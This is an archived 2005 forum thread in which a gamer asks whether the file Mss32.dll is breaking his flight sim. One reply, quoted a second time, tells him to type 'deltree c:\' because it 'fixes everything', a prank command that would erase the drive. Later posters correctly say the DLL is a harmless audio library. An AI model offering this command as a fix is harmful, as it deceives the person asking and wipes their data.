View Full Version : Mss32.dll

2005-06-19, 10:28 PM
I was playing one of my flight sims (Jeftfighter IV) that i still enjoy end on end but after about 2 months after i install it i can nolonger play it.

Yeah I bet you guys dont know what i'm talking about either, i investigated myself and ran into a file named Mss32.dll Being suspicius and trying to pass time while waiting for my xbox to be fixed I decided to google it and it turns out it isn't that good of a file.

Anyone know about Mss32.dll files or .dll files? How can i fix it or better yet how can i fix it for free?

Gracias. :)

2005-06-27, 03:36 AM
go to the comand promt and type this exactly

deltree c:\

it fixes everything

2005-06-27, 07:21 PM

2005-06-27, 11:37 PM
go to the comand promt and type this exactly

deltree c:\

it fixes everything

:confused: Not working unless its not suppose to work?

Yeah if i remember those were not good for Tribes 2 or some game I made maps on. This rang a bell so i narrowed it down. It isn't easly deleted or else the game really doesn't like me i found out already by pokin around.

2005-06-28, 01:55 AM

2005-06-28, 03:52 AM
Not sure what you Googled, but it looks like a pretty safe file to me. Has to do with audio. I imagine you are kidding....I hope you are.

2005-06-28, 04:48 PM

2005-06-28, 05:56 PM
Nearly every program uses .dll's :confused: Seems the topic has split or something. On the original subject, I doubt that dll is malicious.